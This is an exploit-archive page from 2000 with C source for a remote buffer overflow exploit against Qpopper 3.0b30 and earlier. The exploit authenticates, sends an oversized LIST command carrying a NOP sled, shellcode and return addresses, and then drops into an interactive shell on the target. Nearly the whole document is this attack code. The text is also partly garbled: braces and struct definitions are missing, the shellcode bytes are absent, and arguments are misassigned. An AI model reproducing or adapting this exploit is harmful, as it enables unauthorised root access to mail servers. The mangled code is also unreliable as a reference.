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Posted Feb 22, 2000
Authored by Portal | Site security.is

Qpop3.0b30 and below buffer overflow exploit. Remote, but requires username and password.

tags | exploit, remote, overflow
SHA-256 | 5bb66376ba934f2d28de1c8aeb6fd8c5a2ffc62e7eeb4f7942ea86aa3d8efd43


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* Linux(x86) - Crappy exploit for QPOP3.0's LIST bug - PUBLIC VERSION
* This vulnerability was finally made public in January 2000.
* Discovered and exploited by p0rTaL (portal@security.is) Nov 20th 1999
* Greetings go to the security.is team, (\x90, DiGiT, duke, doze), #!teso
* and Ircnet's #hax.
* Compiles on Linux, porting should be easy.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <getopt.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>

#define MAX_TYPE 1
#define NOP '\x90' /* x86 only */

#define HARDCORE
#define DEBUG

#define LINEFEED "\r\n"

int sock = -1;
int port = 110; //this ought to be the default
int type = 0;
int shellcode_num = -1; //use the default
int offset = 0;
int impact_place = 995;
int appenders = APPEND_ADDRESSES;
unsigned char buffer[1500];
struct in_addr in;
char *victim = NULL;

typedef struct
char *platform;
char *function;
char *code;

typedef struct
char *platform;
char *version;
char *tested_on;
SHELLCODE *shellcode;
unsigned long address;

SHELLCODE shellcodes[] =
"Linux libc", "Standard dup2() /bin/bash interactive pipe",

/* this is setreuid(0, 0), additionally bypasses using
islower() characters, and various newlines */
/* this is setuid(0) */
}, {

PLATFORM platforms[] =
{ "Slackware Linux", "3.0b20", "4.0", &shellcodes[0], 0xbffff3e3 },
{ NULL, NULL, NULL, 0, 0 }

char on;
unsigned long start;
unsigned long now;
unsigned long end;
int step;
} bruteforce;

void do_lookup (void)
struct hostent *he;

if ( (he = gethostbyname (victim)) != NULL)
memcpy (&in, he->h_addr, he->h_length);
printf ("Resolved %s to %s\n", victim, inet_ntoa(in));
} else
if ( (inet_aton (victim, &in)) < 0)
fprintf (stderr, "Unable to resolve %s. (errno == %d)\n", victim, errno);
exit (-1);

if ( (sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
fprintf (stderr, "\"Socketation\" failed. (errno == %d)\n", errno);
exit (-1);

void do_connect (void)
struct sockaddr_in si;

memset ((char *)&si, '\0', sizeof (si)); //should clean sin_zero as well
si.sin_family = AF_INET;
si.sin_addr.s_addr = in.s_addr;
si.sin_port = htons(port);

if ( (connect (sock, (struct sockaddr *) &si, sizeof (si))) < 0)
fprintf (stderr, "Unable to connect to %s:%d, errno == %d\n", victim, port, errno);
exit (-1);

// connect (sock, (struct sockaddr *)&si, sizeof(si));

void usage(char *progname)
int i;

printf ("QPOP3.0-LIST remotely local exploit :)\n");
printf ("Discovered and exploited Nov. 20th 1999 by p0rTaL (portal@security.is)\n\n");
printf ("%s <hostname> <user> <passwd> [-p port] [-t type] [-o offset] [-s shellcode]\n", progname);
printf ("Currently supported platforms:\n");

for (i = 0; platforms[i].platform != NULL; i++)
printf ("%d: %s %s, QPOP %s, shellcode %s - %#x\n", i, platforms[i].platform, platforms[i].tested_on,
platforms[i].version, platforms[i].shellcode->platform, platforms[i].address);

printf ("\nCurrent shellcodes:\n");
for (i = 0; shellcodes[i].platform != NULL; i++)
printf ("%d: %s (%d bytes) - %s\n", i, shellcodes[i].platform, strlen (shellcodes[i].code), shellcodes[i].function);

printf ("\n This exploit is for demonstration purposes only. You, and only you, are\n");
printf (" responsible for your OWN actions.\n\n");
exit (0);

void receive (void)
unsigned char buf[1500+1];
int i;

memset (buf, '\0', sizeof(buf));
if ( (read (sock, buf, sizeof(buf)-1)) < 0)
fprintf (stderr, "An error occured while reading from the server. (errno == %d)\n", errno);
close (sock);
exit (-1);
printf ("READ: \033[1;34m");
for (i = 0; i < strlen(buf); i++)
printf ("%02x ", buf[i]);

printf ("\033[0;37m\n(%s)\n", buf);

void transmit (char *string) //no need for a VA list
if ( (write (sock, string, strlen(string))) < 0)
fprintf (stderr, "An error occured during a write attempt to the server. (errno == %d)\n", errno);
exit (-1);

void terminal (int sock)
char buffer[1024+1];
fd_set remote_fds;
fd_set local_fds;
int i;

for (i = 0; i < NSIG; i++)
if (i != SIGINT) //allow the user to ctrl+c out
signal (i, SIG_IGN);

FD_ZERO (&local_fds);
FD_SET (0, &local_fds);
FD_SET (sock, &local_fds);

while (1)
memcpy (&remote_fds, &local_fds, sizeof(local_fds));
if ( (i = select (sock + 1, &remote_fds, NULL, NULL, NULL)) < 0)
fprintf (stderr, "Error, select() returned %d, errno is %d\n", i, errno);
if (i == 0)
fprintf (stderr, "Session was terminated remotely.\n");
if (FD_ISSET (sock, &remote_fds))
if ( (i = read(sock, buffer, sizeof(buffer))) < 0)
/* the user got disconnected, most probably */
#ifdef DEBUG
fprintf (stderr, "read() failed, returned %d, errno is %d\n", i, errno);
fprintf (stderr, "\nDisconnected!\n");
write (1, buffer, i); //stdout, receive
// receive();

if (FD_ISSET (0, &remote_fds))
memset (buffer, '\0', sizeof(buffer));
if ( (i = read(0, buffer, sizeof(buffer))) < 0)
fprintf (stderr, "read() returned %d, errno is %d\n", i, errno);
write (sock, buffer, i); //transmit

void log_on (char *user, char *password, int sock)
char buf[1024+1];
int messages = 0;

printf ("-> Authenticating ...\n");

write (sock, "USER ", 5);
write (sock, user, strlen(user));
write (sock, LINEFEED, strlen(LINEFEED));
usleep (500000); //assuming great bandwidth
memset (buf, '\0', sizeof(buf));
if ( (read (sock, buf, sizeof(buf)-1)) < 0)
fprintf (stderr, "Remote server closed the connection during USER phase.\n");
close (sock);
#ifdef DEBUG
printf (" READ: (%s)\n", buf);
write (sock, "PASS ", 5);
write (sock, password, strlen(password));
write (sock, LINEFEED, strlen(LINEFEED));
usleep (500000);
memset (buf, '\0', sizeof(buf));
if ( (read (sock, buf, sizeof(buf)-1)) < 0)
fprintf (stderr, "Remote server closed the connection during PASS phase.\n");
close (sock);
if ( (strstr (buf, "+OK")) && (strstr (buf, "message")) )
printf ("-> Successfully logged on as \"%s\"\n", user);
*(strstr (buf, " message")) = '\0'; //terminate it
messages = atoi( (char *)(strstr (buf, "has") + 4) );
printf ("-> Message%s: %d ", (messages == 1) ? "" : "s", messages);
if (messages <= 0)
printf ("\033[1;31m=\033[0;37m Not OK\n\n"
"ERROR: The LIST vulnerability cannot be exploited except\n"
" if there are existing messages in the mailbox.\n"
" Go send yourself a mail :)\n");
close (sock);
exit (-1);
printf ("- OK\n");
} else {
fprintf (stderr, "Unable to log on, incorrect user/password or something.\n");
fprintf (stderr, "Last response from server:\n\"%s\"\n", buf);
close (sock);

int main(int argc, char **argv)
int i, next_arg = 0;
char *progname = argv[0];
char *remote_user = NULL,
*remote_passwd = NULL,
*message_number = strdup("1");

if (argc < 4)

memset ((char *)&bruteforce, '\0', sizeof((char *)&bruteforce));

victim = (char *)strdup(argv[1]);

remote_user = (char *)strdup(argv[1]);

remote_passwd = (char *)strdup(argv[1]);

while ( (next_arg = getopt(argc, argv, "p:t:s:o:r:i:b")) != EOF)
switch (next_arg)
case 'p':
if ( (atoi(optarg) < 0) || (atoi(optarg) > 65535) )
fprintf (stderr, "Outrageous port-number! Stick with a number below 65535 (and above zero)\n");
usage (progname);
port = atoi(optarg);
printf (" -> Port set to %d.\n", port);
case 't':
if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE) )
fprintf (stderr, "Invalid type, should range from 0 to %d.\n", MAX_TYPE);
usage (progname);
type = atoi(optarg);
printf (" -> Type set to %d, %s %s.\n", type, platforms[type].platform, platforms[type].tested_on);
case 's':
if ( (atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELLCODE) )
fprintf (stderr, "Invalid shellcode number, should range from 0 to %d.\n", MAX_SHELLCODE);
usage (progname);
shellcode_num = atoi(optarg);
printf (" -> Shellcode set for %s, %s.\n", shellcodes[shellcode_num].platform, shellcodes[shellcode_num].function);
case 'o':
if (bruteforce.on == 1)
fprintf (stderr, "You cannot specify -offset and -bruteforce at the same time.\nMake up your mind!\n");
exit (-1);
offset = atoi(optarg);
printf (" -> Offset set to %d.\n", offset);
case 'b':
bruteforce.on = 1;
printf (" -> Bruteforce mode selected (not fully implemented in this version)\n");
printf (" -> Enter offsets seperated with a space, and a 'step' number (e.g. \"bfffffff bffff000 4\"):\n ");
if ( (fscanf (stdin, "%x %x %d", &bruteforce.start, &bruteforce.end, &bruteforce.step)) != 3)
fprintf (stderr, "Unknown offsets.\n");
exit (-1);
case 'i':
impact_place = atoi(optarg);
printf (" -> Place of impact set to %d.\n", impact_place);
case 'r':
appenders = atoi(optarg);
printf (" -> Number of return addresses set to %d.\n", appenders);
case 'm':
message_number = strdup(optarg);
printf ("-> Message number set to \"%.10s\".\n", message_number);
fprintf (stderr, "Fictional option: '%c', please take your medication.\n", next_arg);
usage (progname);


printf ("\nAttacking %s, a %s %s host\n", victim, platforms[type].platform, platforms[type].tested_on);

if (shellcode_num != -1)
platforms[type].shellcode = &(shellcodes[shellcode_num]);
printf (" - Using %s shellcode\n", shellcodes[shellcode_num].platform);
} else
printf (" - Using the default shellcode, %s\n", platforms[type].shellcode->platform);

if (bruteforce.on == 0)
platforms[type].address -= offset;
printf (" - Using return address %#x\n", platforms[type].address);
printf ("\nAssembling shellspawning code\n");
} else
printf (" - Going to bruteforce from %#x to %#x in steps of %d\n", bruteforce.start, bruteforce.end, bruteforce.step);

printf ("-> Connecting to %s, port %d\n", inet_ntoa(in), port);

receive ();
log_on (remote_user, remote_passwd, sock);

memset (buffer, '\0', sizeof(buffer));
sprintf (buffer, "list %.10s ", message_number); //the bug lies in pop_list.c
/* I do the '%s' to allow the possibility to enter '0001', in order
a non-working length of <nops>+<shellcode>+<ret>... (theoretically ;) */

#ifdef DEBUG
printf ("Step 1, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));

memset (buffer+strlen(buffer), NOP, sizeof(buffer)-strlen(buffer)-1);

#ifdef DEBUG
printf ("Step 2, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));

strncpy (buffer + impact_place - strlen(platforms[type].shellcode->code), platforms[type].shellcode->code,
sizeof(buffer) - impact_place - 5 - 1);
//impact_place + strlen(platforms[type].shellcode->code) - (APPEND_ADDRESSES * sizeof(platforms[type].address) + 2) - 1);

#ifdef DEBUG
printf ("Step 3, sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));

i = 0;

while (i < appenders)
o = buffer + strlen(buffer);
*(o) = (platforms[type].address & 0x000000ff);
*(o+1) = (platforms[type].address & 0x0000ff00) >> 8;
*(o+2) = (platforms[type].address & 0x00ff0000) >> 16;
*(o+3) = (platforms[type].address & 0xff000000) >> 24;
*(o+4) = '\0';

memcpy ((char *)&buffer + strlen(buffer), &platforms[type].address, 4);
printf ("-> sizeof(buffer) = %d, strlen = %d\n", sizeof(buffer), strlen(buffer));

strcpy (buffer + strlen(buffer), "\x0d\x0a"); // \x00 gets appended automatically

printf ("Code is:\n\033[1;31m");
for (i = 0; i < strlen(buffer); i++)
printf ("%02x ", buffer[i]);

printf ("\033[0;37m\n");

transmit (buffer);
receive ();
printf ("Got shell!\n");

terminal (sock);

close (sock);
//not reached

return (0);

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